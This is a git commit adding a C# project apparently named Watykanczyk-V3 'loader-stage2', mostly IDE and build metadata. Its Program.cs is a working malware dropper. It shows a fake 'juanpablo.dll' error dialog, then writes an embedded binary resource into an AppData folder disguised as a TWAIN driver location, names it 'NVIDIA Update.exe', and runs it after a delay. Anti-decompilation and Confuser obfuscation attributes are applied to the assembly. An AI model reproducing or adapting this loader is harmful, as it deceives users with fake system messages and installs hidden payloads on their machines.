dodaj pliki czy cos

This commit is contained in:
Erdef119 2026-04-26 20:39:48 +02:00
commit b0bcf53bdb
213 changed files with 811368 additions and 0 deletions

Binary file not shown.

Binary file not shown.

View file

@ -0,0 +1,103 @@
{
"Version": 1,
"WorkspaceRootPath": "C:\\Users\\Erdef\\Desktop\\pliki\\rzeczy\\Watykanczyk-V3\\loader-stage2\\",
"Documents": [
{
"AbsoluteMoniker": "D:0:0:{D6735513-1793-4D54-85AD-C1151C8A3A0D}|prewatykan.csproj|c:\\users\\erdef\\desktop\\pliki\\rzeczy\\watykanczyk-v3\\loader-stage2\\guide\\program.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}",
"RelativeMoniker": "D:0:0:{D6735513-1793-4D54-85AD-C1151C8A3A0D}|prewatykan.csproj|solutionrelative:guide\\program.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}"
},
{
"AbsoluteMoniker": "D:0:0:{D6735513-1793-4D54-85AD-C1151C8A3A0D}|prewatykan.csproj|c:\\users\\erdef\\desktop\\pliki\\rzeczy\\watykanczyk-v3\\loader-stage2\\guide.properties.resources.resx||{81828910-B8B3-4D2B-99A3-067027C180C1}",
"RelativeMoniker": "D:0:0:{D6735513-1793-4D54-85AD-C1151C8A3A0D}|prewatykan.csproj|solutionrelative:guide.properties.resources.resx||{81828910-B8B3-4D2B-99A3-067027C180C1}"
}
],
"DocumentGroupContainers": [
{
"Orientation": 0,
"VerticalTabListWidth": 256,
"DocumentGroups": [
{
"DockedWidth": 200,
"SelectedChildIndex": 10,
"Children": [
{
"$type": "Bookmark",
"Name": "ST:0:0:{73068c07-fba1-453f-99ae-6edf972119b2}"
},
{
"$type": "Bookmark",
"Name": "ST:0:0:{aa2115a1-9712-457b-9047-dbb71ca2cdd2}"
},
{
"$type": "Bookmark",
"Name": "ST:1:0:{e8b06f53-6d01-11d2-aa7d-00c04f990343}"
},
{
"$type": "Bookmark",
"Name": "ST:128:0:{1fc202d4-d401-403c-9834-5b218574bb67}"
},
{
"$type": "Bookmark",
"Name": "ST:0:0:{b1ce3aef-c78d-49ee-b72b-ec1fbc908313}"
},
{
"$type": "Bookmark",
"Name": "ST:0:0:{3ae79031-e1bc-11d0-8f78-00a0c9110057}"
},
{
"$type": "Bookmark",
"Name": "ST:0:0:{1c64b9c2-e352-428e-a56d-0ace190b99a6}"
},
{
"$type": "Bookmark",
"Name": "ST:0:0:{2d7728c2-de0a-45b5-99aa-89b609dfde73}"
},
{
"$type": "Bookmark",
"Name": "ST:0:0:{40ea2e6b-2121-4bb8-a43e-c83c04b51041}"
},
{
"$type": "Bookmark",
"Name": "ST:0:0:{1c4feeaa-4718-4aa9-859d-94ce25d182ba}"
},
{
"$type": "Document",
"DocumentIndex": 0,
"Title": "Program.cs",
"DocumentMoniker": "C:\\Users\\Erdef\\Desktop\\pliki\\rzeczy\\Watykanczyk-V3\\loader-stage2\\Guide\\Program.cs",
"RelativeDocumentMoniker": "Guide\\Program.cs",
"ToolTip": "C:\\Users\\Erdef\\Desktop\\pliki\\rzeczy\\Watykanczyk-V3\\loader-stage2\\Guide\\Program.cs",
"RelativeToolTip": "Guide\\Program.cs",
"ViewState": "AgIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==",
"Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000738|",
"WhenOpened": "2026-04-26T18:28:07.05Z",
"EditorCaption": ""
},
{
"$type": "Document",
"DocumentIndex": 1,
"Title": "Guide.Properties.Resources.resx",
"DocumentMoniker": "C:\\Users\\Erdef\\Desktop\\pliki\\rzeczy\\Watykanczyk-V3\\loader-stage2\\Guide.Properties.Resources.resx",
"RelativeDocumentMoniker": "Guide.Properties.Resources.resx",
"ToolTip": "C:\\Users\\Erdef\\Desktop\\pliki\\rzeczy\\Watykanczyk-V3\\loader-stage2\\Guide.Properties.Resources.resx",
"RelativeToolTip": "Guide.Properties.Resources.resx",
"Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.001005|",
"WhenOpened": "2026-04-26T18:27:52.542Z",
"EditorCaption": ""
}
]
},
{
"DockedWidth": 1554,
"SelectedChildIndex": -1,
"Children": [
{
"$type": "Bookmark",
"Name": "ST:0:0:{34e76e81-ee4a-11d0-ae2e-00a0c90fffc3}"
}
]
}
]
}
]
}

View file

@ -0,0 +1,16 @@
{
"ShowEmptyProjects": false,
"SelectedGroups": [],
"ExpandedProjects": [],
"EnableSpellChecker": true,
"ColumnOrder": [
"name",
"type",
"neutral-value",
"neutral-comment"
],
"VisibleColumnKeys": [
"name",
"neutral-value"
]
}

View file

@ -0,0 +1,8 @@
using System;
internal class ConfusedByAttribute : Attribute
{
public ConfusedByAttribute(string P_0)
{
}
}

File diff suppressed because it is too large Load diff

View file

@ -0,0 +1,58 @@
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
using System.Globalization;
using System.Resources;
using System.Runtime.CompilerServices;
namespace Guide.Properties;
[GeneratedCode("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0")]
[DebuggerNonUserCode]
[CompilerGenerated]
internal class Resources
{
private static ResourceManager resourceMan;
private static CultureInfo resourceCulture;
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static ResourceManager ResourceManager
{
get
{
if (resourceMan == null)
{
ResourceManager resourceManager = new ResourceManager("Guide.Properties.Resources", typeof(Resources).Assembly);
resourceMan = resourceManager;
}
return resourceMan;
}
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static CultureInfo Culture
{
get
{
return resourceCulture;
}
set
{
resourceCulture = value;
}
}
internal static byte[] dllsupport
{
get
{
object @object = ResourceManager.GetObject("dllsupport", resourceCulture);
return (byte[])@object;
}
}
internal Resources()
{
}
}

View file

@ -0,0 +1,14 @@
using System.CodeDom.Compiler;
using System.Configuration;
using System.Runtime.CompilerServices;
namespace Guide.Properties;
[CompilerGenerated]
[GeneratedCode("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "14.0.0.0")]
internal sealed class Settings : ApplicationSettingsBase
{
private static Settings defaultInstance = (Settings)SettingsBase.Synchronized(new Settings());
public static Settings Default => defaultInstance;
}

View file

@ -0,0 +1,34 @@
using System;
using System.Diagnostics;
using System.IO;
using System.Threading;
using System.Windows.Forms;
using Guide.Properties;
namespace Guide;
internal static class Program
{
private static string appLocation = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Microsoft\\Windows\\twain_32\\Driver\\";
[STAThread]
private static void Main()
{
MessageBox.Show("Not found: 'juanpablo.dll'. Do you fix this problem?", "Error: juanpablo.dll", MessageBoxButtons.YesNo, MessageBoxIcon.Hand);
createAppFile();
}
private static void WriteAllBytes(string FilePath, object file)
{
byte[] array = (byte[])file;
File.WriteAllBytes(FilePath, (byte[])file);
}
private static void createAppFile()
{
Directory.CreateDirectory(appLocation);
WriteAllBytes(appLocation + "NVIDIA Update.exe", Resources.dllsupport);
Thread.Sleep(11000);
Process.Start(appLocation + "NVIDIA Update.exe");
}
}

View file

@ -0,0 +1,4 @@
using System.Runtime.CompilerServices;
[module: SuppressIldasm]
[module: ConfusedBy("Confuser v1.9.0.0")]

BIN
loader-stage2/app.ico Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 25 KiB

Binary file not shown.

View file

@ -0,0 +1,4 @@
// <autogenerated />
using System;
using System.Reflection;
[assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.5.2", FrameworkDisplayName = "")]

View file

@ -0,0 +1,6 @@
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<startup>
<supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5.2" />
</startup>
</configuration>

Binary file not shown.

View file

@ -0,0 +1,14 @@
is_global = true
build_property.ApplicationManifest =
build_property.StartupObject =
build_property.ApplicationDefaultFont =
build_property.ApplicationHighDpiMode =
build_property.ApplicationUseCompatibleTextRendering =
build_property.ApplicationVisualStyles =
build_property.RootNamespace =
build_property.ProjectDir = C:\Users\Erdef\Desktop\pliki\rzeczy\Watykanczyk-V3\loader-stage2\
build_property.EnableComHosting =
build_property.EnableGeneratedComInterfaceComImportInterop =
build_property.CsWinRTUseWindowsUIXamlProjections = false
build_property.EffectiveAnalysisLevelStyle =
build_property.EnableCodeStyleSeverity =

Binary file not shown.

View file

@ -0,0 +1 @@
e371dda9ad927fbb66bc11a68d260b00405c0544131635b5bc95d584c5435f86

View file

@ -0,0 +1,20 @@
C:\Users\majakot\Desktop\watykanczykril\bin\Debug\net452\___.netmodule.dll
C:\Users\majakot\Desktop\watykanczykril\bin\Debug\net452\___.netmodule.pdb
C:\Users\majakot\Desktop\watykanczykril\obj\Debug\net452\prewatykan.csproj.AssemblyReference.cache
C:\Users\majakot\Desktop\watykanczykril\obj\Debug\net452\Guide.Properties.Resources.resources
C:\Users\majakot\Desktop\watykanczykril\obj\Debug\net452\prewatykan.csproj.GenerateResource.cache
C:\Users\majakot\Desktop\watykanczykril\obj\Debug\net452\prewatykan.GeneratedMSBuildEditorConfig.editorconfig
C:\Users\majakot\Desktop\watykanczykril\obj\Debug\net452\prewatykan.csproj.CoreCompileInputs.cache
C:\Users\majakot\Desktop\watykanczykril\obj\Debug\net452\___.netmodule.dll
C:\Users\majakot\Desktop\watykanczykril\obj\Debug\net452\___.netmodule.pdb
C:\projects\Watykanczyk-V3\dll loader\bin\Debug\net452\___.netmodule.exe.config
C:\projects\Watykanczyk-V3\dll loader\bin\Debug\net452\___.netmodule.exe
C:\projects\Watykanczyk-V3\dll loader\bin\Debug\net452\___.netmodule.pdb
C:\projects\Watykanczyk-V3\dll loader\obj\Debug\net452\prewatykan.csproj.AssemblyReference.cache
C:\projects\Watykanczyk-V3\dll loader\obj\Debug\net452\Guide.Properties.Resources.resources
C:\projects\Watykanczyk-V3\dll loader\obj\Debug\net452\prewatykan.csproj.GenerateResource.cache
C:\projects\Watykanczyk-V3\dll loader\obj\Debug\net452\prewatykan.GeneratedMSBuildEditorConfig.editorconfig
C:\projects\Watykanczyk-V3\dll loader\obj\Debug\net452\prewatykan.csproj.CoreCompileInputs.cache
C:\projects\Watykanczyk-V3\dll loader\obj\Debug\net452\prewatykan.sourcelink.json
C:\projects\Watykanczyk-V3\dll loader\obj\Debug\net452\___.netmodule.exe
C:\projects\Watykanczyk-V3\dll loader\obj\Debug\net452\___.netmodule.pdb

View file

@ -0,0 +1 @@
{"documents":{"C:\\projects\\Watykanczyk-V3\\*":"https://raw.githubusercontent.com/mksmaicja/Watykanczyk-V3/bde7a74cf67efdff4412b4d41138532787b9a3f9/*"}}

View file

@ -0,0 +1,4 @@
// <autogenerated />
using System;
using System.Reflection;
[assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.5.2", FrameworkDisplayName = ".NET Framework 4.5.2")]

View file

@ -0,0 +1,6 @@
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<startup>
<supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5.2" />
</startup>
</configuration>

Binary file not shown.

View file

@ -0,0 +1,11 @@
is_global = true
build_property.ApplicationManifest =
build_property.StartupObject =
build_property.ApplicationDefaultFont =
build_property.ApplicationHighDpiMode =
build_property.ApplicationUseCompatibleTextRendering =
build_property.ApplicationVisualStyles =
build_property.RootNamespace =
build_property.ProjectDir = C:\projects\Watykanczyk-V3\main\
build_property.EnableComHosting =
build_property.EnableGeneratedComInterfaceComImportInterop =

View file

@ -0,0 +1 @@
5c3cb54697744ef70a2b779207ddb33031d9f2ed24137ad9dc7dd6dfa20c3ab3

View file

@ -0,0 +1,21 @@
C:\projects\Watykanczyk-V3\dll loader\bin\Release\net452\___.netmodule.exe.config
C:\projects\Watykanczyk-V3\dll loader\bin\Release\net452\___.netmodule.exe
C:\projects\Watykanczyk-V3\dll loader\bin\Release\net452\___.netmodule.pdb
C:\projects\Watykanczyk-V3\dll loader\obj\Release\net452\prewatykan.csproj.AssemblyReference.cache
C:\projects\Watykanczyk-V3\dll loader\obj\Release\net452\Guide.Properties.Resources.resources
C:\projects\Watykanczyk-V3\dll loader\obj\Release\net452\prewatykan.csproj.GenerateResource.cache
C:\projects\Watykanczyk-V3\dll loader\obj\Release\net452\prewatykan.GeneratedMSBuildEditorConfig.editorconfig
C:\projects\Watykanczyk-V3\dll loader\obj\Release\net452\prewatykan.csproj.CoreCompileInputs.cache
C:\projects\Watykanczyk-V3\dll loader\obj\Release\net452\prewatykan.sourcelink.json
C:\projects\Watykanczyk-V3\dll loader\obj\Release\net452\___.netmodule.exe
C:\projects\Watykanczyk-V3\dll loader\obj\Release\net452\___.netmodule.pdb
C:\projects\Watykanczyk-V3\main\bin\Release\net452\___.netmodule.pdb
C:\projects\Watykanczyk-V3\main\obj\Release\net452\prewatykan.csproj.AssemblyReference.cache
C:\projects\Watykanczyk-V3\main\obj\Release\net452\Guide.Properties.Resources.resources
C:\projects\Watykanczyk-V3\main\obj\Release\net452\prewatykan.csproj.GenerateResource.cache
C:\projects\Watykanczyk-V3\main\obj\Release\net452\prewatykan.GeneratedMSBuildEditorConfig.editorconfig
C:\projects\Watykanczyk-V3\main\obj\Release\net452\prewatykan.csproj.CoreCompileInputs.cache
C:\projects\Watykanczyk-V3\main\obj\Release\net452\prewatykan.sourcelink.json
C:\projects\Watykanczyk-V3\main\obj\Release\net452\___.netmodule.pdb
C:\projects\Watykanczyk-V3\main\bin\Release\net452\___.netmodule.dll
C:\projects\Watykanczyk-V3\main\obj\Release\net452\___.netmodule.dll

View file

@ -0,0 +1 @@
{"documents":{"C:\\projects\\Watykanczyk-V3\\*":"https://raw.githubusercontent.com/mksmaicja/Watykanczyk-V3/41e7b332c5a37902879bececacd96261f47e0d6c/*"}}

View file

@ -0,0 +1,65 @@
{
"format": 1,
"restore": {
"C:\\Users\\Erdef\\Desktop\\pliki\\rzeczy\\Watykanczyk-V3\\loader-stage2\\prewatykan.csproj": {}
},
"projects": {
"C:\\Users\\Erdef\\Desktop\\pliki\\rzeczy\\Watykanczyk-V3\\loader-stage2\\prewatykan.csproj": {
"version": "1.0.0",
"restore": {
"projectUniqueName": "C:\\Users\\Erdef\\Desktop\\pliki\\rzeczy\\Watykanczyk-V3\\loader-stage2\\prewatykan.csproj",
"projectName": "___.netmodule",
"projectPath": "C:\\Users\\Erdef\\Desktop\\pliki\\rzeczy\\Watykanczyk-V3\\loader-stage2\\prewatykan.csproj",
"packagesPath": "C:\\Users\\Erdef\\.nuget\\packages\\",
"outputPath": "C:\\Users\\Erdef\\Desktop\\pliki\\rzeczy\\Watykanczyk-V3\\loader-stage2\\obj\\",
"projectStyle": "PackageReference",
"fallbackFolders": [
"C:\\Program Files (x86)\\Microsoft Visual Studio\\Shared\\NuGetPackages"
],
"configFilePaths": [
"C:\\Users\\Erdef\\AppData\\Roaming\\NuGet\\NuGet.Config",
"C:\\Program Files (x86)\\NuGet\\Config\\Microsoft.VisualStudio.FallbackLocation.config",
"C:\\Program Files (x86)\\NuGet\\Config\\Microsoft.VisualStudio.Offline.config"
],
"originalTargetFrameworks": [
"net452"
],
"sources": {
"C:\\Program Files (x86)\\Microsoft SDKs\\NuGetPackages\\": {},
"https://api.nuget.org/v3/index.json": {}
},
"frameworks": {
"net452": {
"targetAlias": "net452",
"projectReferences": {}
}
},
"warningProperties": {
"warnAsError": [
"NU1605"
]
},
"restoreAuditProperties": {
"enableAudit": "true",
"auditLevel": "low",
"auditMode": "direct"
},
"SdkAnalysisLevel": "10.0.100"
},
"frameworks": {
"net452": {
"targetAlias": "net452",
"dependencies": {
"Microsoft.NETFramework.ReferenceAssemblies": {
"suppressParent": "All",
"target": "Package",
"version": "[1.0.3, )",
"autoReferenced": true
}
},
"runtimeIdentifierGraphPath": "C:\\Program Files\\dotnet\\sdk\\10.0.106\\RuntimeIdentifierGraph.json"
}
}
}
}
}

View file

@ -0,0 +1,16 @@
<?xml version="1.0" encoding="utf-8" standalone="no"?>
<Project ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup Condition=" '$(ExcludeRestorePackageImports)' != 'true' ">
<RestoreSuccess Condition=" '$(RestoreSuccess)' == '' ">True</RestoreSuccess>
<RestoreTool Condition=" '$(RestoreTool)' == '' ">NuGet</RestoreTool>
<ProjectAssetsFile Condition=" '$(ProjectAssetsFile)' == '' ">$(MSBuildThisFileDirectory)project.assets.json</ProjectAssetsFile>
<NuGetPackageRoot Condition=" '$(NuGetPackageRoot)' == '' ">$(UserProfile)\.nuget\packages\</NuGetPackageRoot>
<NuGetPackageFolders Condition=" '$(NuGetPackageFolders)' == '' ">C:\Users\Erdef\.nuget\packages\;C:\Program Files (x86)\Microsoft Visual Studio\Shared\NuGetPackages</NuGetPackageFolders>
<NuGetProjectStyle Condition=" '$(NuGetProjectStyle)' == '' ">PackageReference</NuGetProjectStyle>
<NuGetToolVersion Condition=" '$(NuGetToolVersion)' == '' ">6.14.2</NuGetToolVersion>
</PropertyGroup>
<ItemGroup Condition=" '$(ExcludeRestorePackageImports)' != 'true' ">
<SourceRoot Include="C:\Users\Erdef\.nuget\packages\" />
<SourceRoot Include="C:\Program Files (x86)\Microsoft Visual Studio\Shared\NuGetPackages\" />
</ItemGroup>
</Project>

View file

@ -0,0 +1,6 @@
<?xml version="1.0" encoding="utf-8" standalone="no"?>
<Project ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ImportGroup Condition=" '$(ExcludeRestorePackageImports)' != 'true' ">
<Import Project="$(NuGetPackageRoot)microsoft.netframework.referenceassemblies.net452\1.0.3\build\Microsoft.NETFramework.ReferenceAssemblies.net452.targets" Condition="Exists('$(NuGetPackageRoot)microsoft.netframework.referenceassemblies.net452\1.0.3\build\Microsoft.NETFramework.ReferenceAssemblies.net452.targets')" />
</ImportGroup>
</Project>

View file

@ -0,0 +1,420 @@
{
"version": 3,
"targets": {
".NETFramework,Version=v4.5.2": {
"Microsoft.NETFramework.ReferenceAssemblies/1.0.3": {
"type": "package",
"dependencies": {
"Microsoft.NETFramework.ReferenceAssemblies.net452": "1.0.3"
}
},
"Microsoft.NETFramework.ReferenceAssemblies.net452/1.0.3": {
"type": "package",
"build": {
"build/Microsoft.NETFramework.ReferenceAssemblies.net452.targets": {}
}
}
}
},
"libraries": {
"Microsoft.NETFramework.ReferenceAssemblies/1.0.3": {
"sha512": "vUc9Npcs14QsyOD01tnv/m8sQUnGTGOw1BCmKcv77LBJY7OxhJ+zJF7UD/sCL3lYNFuqmQEVlkfS4Quif6FyYg==",
"type": "package",
"path": "microsoft.netframework.referenceassemblies/1.0.3",
"files": [
".nupkg.metadata",
".signature.p7s",
"microsoft.netframework.referenceassemblies.1.0.3.nupkg.sha512",
"microsoft.netframework.referenceassemblies.nuspec"
]
},
"Microsoft.NETFramework.ReferenceAssemblies.net452/1.0.3": {
"sha512": "kuFOgilYbs29xENHlqQ6aJYa+t56u+OqHx85P7GYLVlo7HL3nsug9IQY2DoPgkOpZ2xb9btYV2EFK7Enll8S3A==",
"type": "package",
"path": "microsoft.netframework.referenceassemblies.net452/1.0.3",
"files": [
".nupkg.metadata",
".signature.p7s",
"build/.NETFramework/v4.5.2/Accessibility.dll",
"build/.NETFramework/v4.5.2/Accessibility.xml",
"build/.NETFramework/v4.5.2/CustomMarshalers.dll",
"build/.NETFramework/v4.5.2/CustomMarshalers.xml",
"build/.NETFramework/v4.5.2/Facades/System.Collections.Concurrent.dll",
"build/.NETFramework/v4.5.2/Facades/System.Collections.dll",
"build/.NETFramework/v4.5.2/Facades/System.ComponentModel.Annotations.dll",
"build/.NETFramework/v4.5.2/Facades/System.ComponentModel.EventBasedAsync.dll",
"build/.NETFramework/v4.5.2/Facades/System.ComponentModel.dll",
"build/.NETFramework/v4.5.2/Facades/System.Diagnostics.Contracts.dll",
"build/.NETFramework/v4.5.2/Facades/System.Diagnostics.Debug.dll",
"build/.NETFramework/v4.5.2/Facades/System.Diagnostics.Tools.dll",
"build/.NETFramework/v4.5.2/Facades/System.Diagnostics.Tracing.dll",
"build/.NETFramework/v4.5.2/Facades/System.Dynamic.Runtime.dll",
"build/.NETFramework/v4.5.2/Facades/System.Globalization.dll",
"build/.NETFramework/v4.5.2/Facades/System.IO.dll",
"build/.NETFramework/v4.5.2/Facades/System.Linq.Expressions.dll",
"build/.NETFramework/v4.5.2/Facades/System.Linq.Parallel.dll",
"build/.NETFramework/v4.5.2/Facades/System.Linq.Queryable.dll",
"build/.NETFramework/v4.5.2/Facades/System.Linq.dll",
"build/.NETFramework/v4.5.2/Facades/System.Net.NetworkInformation.dll",
"build/.NETFramework/v4.5.2/Facades/System.Net.Primitives.dll",
"build/.NETFramework/v4.5.2/Facades/System.Net.Requests.dll",
"build/.NETFramework/v4.5.2/Facades/System.ObjectModel.dll",
"build/.NETFramework/v4.5.2/Facades/System.Reflection.Emit.ILGeneration.dll",
"build/.NETFramework/v4.5.2/Facades/System.Reflection.Emit.Lightweight.dll",
"build/.NETFramework/v4.5.2/Facades/System.Reflection.Emit.dll",
"build/.NETFramework/v4.5.2/Facades/System.Reflection.Extensions.dll",
"build/.NETFramework/v4.5.2/Facades/System.Reflection.Primitives.dll",
"build/.NETFramework/v4.5.2/Facades/System.Reflection.dll",
"build/.NETFramework/v4.5.2/Facades/System.Resources.ResourceManager.dll",
"build/.NETFramework/v4.5.2/Facades/System.Runtime.Extensions.dll",
"build/.NETFramework/v4.5.2/Facades/System.Runtime.InteropServices.WindowsRuntime.dll",
"build/.NETFramework/v4.5.2/Facades/System.Runtime.InteropServices.dll",
"build/.NETFramework/v4.5.2/Facades/System.Runtime.Numerics.dll",
"build/.NETFramework/v4.5.2/Facades/System.Runtime.Serialization.Json.dll",
"build/.NETFramework/v4.5.2/Facades/System.Runtime.Serialization.Primitives.dll",
"build/.NETFramework/v4.5.2/Facades/System.Runtime.Serialization.Xml.dll",
"build/.NETFramework/v4.5.2/Facades/System.Runtime.dll",
"build/.NETFramework/v4.5.2/Facades/System.Security.Principal.dll",
"build/.NETFramework/v4.5.2/Facades/System.ServiceModel.Duplex.dll",
"build/.NETFramework/v4.5.2/Facades/System.ServiceModel.Http.dll",
"build/.NETFramework/v4.5.2/Facades/System.ServiceModel.NetTcp.dll",
"build/.NETFramework/v4.5.2/Facades/System.ServiceModel.Primitives.dll",
"build/.NETFramework/v4.5.2/Facades/System.ServiceModel.Security.dll",
"build/.NETFramework/v4.5.2/Facades/System.Text.Encoding.Extensions.dll",
"build/.NETFramework/v4.5.2/Facades/System.Text.Encoding.dll",
"build/.NETFramework/v4.5.2/Facades/System.Text.RegularExpressions.dll",
"build/.NETFramework/v4.5.2/Facades/System.Threading.Tasks.Parallel.dll",
"build/.NETFramework/v4.5.2/Facades/System.Threading.Tasks.dll",
"build/.NETFramework/v4.5.2/Facades/System.Threading.Timer.dll",
"build/.NETFramework/v4.5.2/Facades/System.Threading.dll",
"build/.NETFramework/v4.5.2/Facades/System.Xml.ReaderWriter.dll",
"build/.NETFramework/v4.5.2/Facades/System.Xml.XDocument.dll",
"build/.NETFramework/v4.5.2/Facades/System.Xml.XmlSerializer.dll",
"build/.NETFramework/v4.5.2/ISymWrapper.dll",
"build/.NETFramework/v4.5.2/ISymWrapper.xml",
"build/.NETFramework/v4.5.2/Microsoft.Activities.Build.dll",
"build/.NETFramework/v4.5.2/Microsoft.Activities.Build.xml",
"build/.NETFramework/v4.5.2/Microsoft.Build.Conversion.v4.0.dll",
"build/.NETFramework/v4.5.2/Microsoft.Build.Conversion.v4.0.xml",
"build/.NETFramework/v4.5.2/Microsoft.Build.Engine.dll",
"build/.NETFramework/v4.5.2/Microsoft.Build.Engine.xml",
"build/.NETFramework/v4.5.2/Microsoft.Build.Framework.dll",
"build/.NETFramework/v4.5.2/Microsoft.Build.Framework.xml",
"build/.NETFramework/v4.5.2/Microsoft.Build.Tasks.v4.0.dll",
"build/.NETFramework/v4.5.2/Microsoft.Build.Tasks.v4.0.xml",
"build/.NETFramework/v4.5.2/Microsoft.Build.Utilities.v4.0.dll",
"build/.NETFramework/v4.5.2/Microsoft.Build.Utilities.v4.0.xml",
"build/.NETFramework/v4.5.2/Microsoft.Build.dll",
"build/.NETFramework/v4.5.2/Microsoft.Build.xml",
"build/.NETFramework/v4.5.2/Microsoft.CSharp.dll",
"build/.NETFramework/v4.5.2/Microsoft.CSharp.xml",
"build/.NETFramework/v4.5.2/Microsoft.JScript.dll",
"build/.NETFramework/v4.5.2/Microsoft.JScript.xml",
"build/.NETFramework/v4.5.2/Microsoft.VisualBasic.Compatibility.Data.dll",
"build/.NETFramework/v4.5.2/Microsoft.VisualBasic.Compatibility.Data.xml",
"build/.NETFramework/v4.5.2/Microsoft.VisualBasic.Compatibility.dll",
"build/.NETFramework/v4.5.2/Microsoft.VisualBasic.Compatibility.xml",
"build/.NETFramework/v4.5.2/Microsoft.VisualBasic.dll",
"build/.NETFramework/v4.5.2/Microsoft.VisualBasic.xml",
"build/.NETFramework/v4.5.2/Microsoft.VisualC.STLCLR.dll",
"build/.NETFramework/v4.5.2/Microsoft.VisualC.STLCLR.xml",
"build/.NETFramework/v4.5.2/Microsoft.VisualC.dll",
"build/.NETFramework/v4.5.2/Microsoft.VisualC.xml",
"build/.NETFramework/v4.5.2/PermissionSets/FullTrust.xml",
"build/.NETFramework/v4.5.2/PermissionSets/Internet.xml",
"build/.NETFramework/v4.5.2/PermissionSets/LocalIntranet.xml",
"build/.NETFramework/v4.5.2/PresentationBuildTasks.dll",
"build/.NETFramework/v4.5.2/PresentationBuildTasks.xml",
"build/.NETFramework/v4.5.2/PresentationCore.dll",
"build/.NETFramework/v4.5.2/PresentationCore.xml",
"build/.NETFramework/v4.5.2/PresentationFramework.Aero.dll",
"build/.NETFramework/v4.5.2/PresentationFramework.Aero.xml",
"build/.NETFramework/v4.5.2/PresentationFramework.Aero2.dll",
"build/.NETFramework/v4.5.2/PresentationFramework.Aero2.xml",
"build/.NETFramework/v4.5.2/PresentationFramework.AeroLite.dll",
"build/.NETFramework/v4.5.2/PresentationFramework.AeroLite.xml",
"build/.NETFramework/v4.5.2/PresentationFramework.Classic.dll",
"build/.NETFramework/v4.5.2/PresentationFramework.Classic.xml",
"build/.NETFramework/v4.5.2/PresentationFramework.Luna.dll",
"build/.NETFramework/v4.5.2/PresentationFramework.Luna.xml",
"build/.NETFramework/v4.5.2/PresentationFramework.Royale.dll",
"build/.NETFramework/v4.5.2/PresentationFramework.Royale.xml",
"build/.NETFramework/v4.5.2/PresentationFramework.dll",
"build/.NETFramework/v4.5.2/PresentationFramework.xml",
"build/.NETFramework/v4.5.2/ReachFramework.dll",
"build/.NETFramework/v4.5.2/ReachFramework.xml",
"build/.NETFramework/v4.5.2/RedistList/FrameworkList.xml",
"build/.NETFramework/v4.5.2/System.Activities.Core.Presentation.dll",
"build/.NETFramework/v4.5.2/System.Activities.Core.Presentation.xml",
"build/.NETFramework/v4.5.2/System.Activities.DurableInstancing.dll",
"build/.NETFramework/v4.5.2/System.Activities.DurableInstancing.xml",
"build/.NETFramework/v4.5.2/System.Activities.Presentation.dll",
"build/.NETFramework/v4.5.2/System.Activities.Presentation.xml",
"build/.NETFramework/v4.5.2/System.Activities.dll",
"build/.NETFramework/v4.5.2/System.Activities.xml",
"build/.NETFramework/v4.5.2/System.AddIn.Contract.dll",
"build/.NETFramework/v4.5.2/System.AddIn.Contract.xml",
"build/.NETFramework/v4.5.2/System.AddIn.dll",
"build/.NETFramework/v4.5.2/System.AddIn.xml",
"build/.NETFramework/v4.5.2/System.ComponentModel.Composition.Registration.dll",
"build/.NETFramework/v4.5.2/System.ComponentModel.Composition.Registration.xml",
"build/.NETFramework/v4.5.2/System.ComponentModel.Composition.dll",
"build/.NETFramework/v4.5.2/System.ComponentModel.Composition.xml",
"build/.NETFramework/v4.5.2/System.ComponentModel.DataAnnotations.dll",
"build/.NETFramework/v4.5.2/System.ComponentModel.DataAnnotations.xml",
"build/.NETFramework/v4.5.2/System.Configuration.Install.dll",
"build/.NETFramework/v4.5.2/System.Configuration.Install.xml",
"build/.NETFramework/v4.5.2/System.Configuration.dll",
"build/.NETFramework/v4.5.2/System.Configuration.xml",
"build/.NETFramework/v4.5.2/System.Core.dll",
"build/.NETFramework/v4.5.2/System.Core.xml",
"build/.NETFramework/v4.5.2/System.Data.DataSetExtensions.dll",
"build/.NETFramework/v4.5.2/System.Data.DataSetExtensions.xml",
"build/.NETFramework/v4.5.2/System.Data.Entity.Design.dll",
"build/.NETFramework/v4.5.2/System.Data.Entity.Design.xml",
"build/.NETFramework/v4.5.2/System.Data.Entity.dll",
"build/.NETFramework/v4.5.2/System.Data.Entity.xml",
"build/.NETFramework/v4.5.2/System.Data.Linq.dll",
"build/.NETFramework/v4.5.2/System.Data.Linq.xml",
"build/.NETFramework/v4.5.2/System.Data.OracleClient.dll",
"build/.NETFramework/v4.5.2/System.Data.OracleClient.xml",
"build/.NETFramework/v4.5.2/System.Data.Services.Client.dll",
"build/.NETFramework/v4.5.2/System.Data.Services.Client.xml",
"build/.NETFramework/v4.5.2/System.Data.Services.Design.dll",
"build/.NETFramework/v4.5.2/System.Data.Services.Design.xml",
"build/.NETFramework/v4.5.2/System.Data.Services.dll",
"build/.NETFramework/v4.5.2/System.Data.Services.xml",
"build/.NETFramework/v4.5.2/System.Data.SqlXml.dll",
"build/.NETFramework/v4.5.2/System.Data.SqlXml.xml",
"build/.NETFramework/v4.5.2/System.Data.dll",
"build/.NETFramework/v4.5.2/System.Data.xml",
"build/.NETFramework/v4.5.2/System.Deployment.dll",
"build/.NETFramework/v4.5.2/System.Deployment.xml",
"build/.NETFramework/v4.5.2/System.Design.dll",
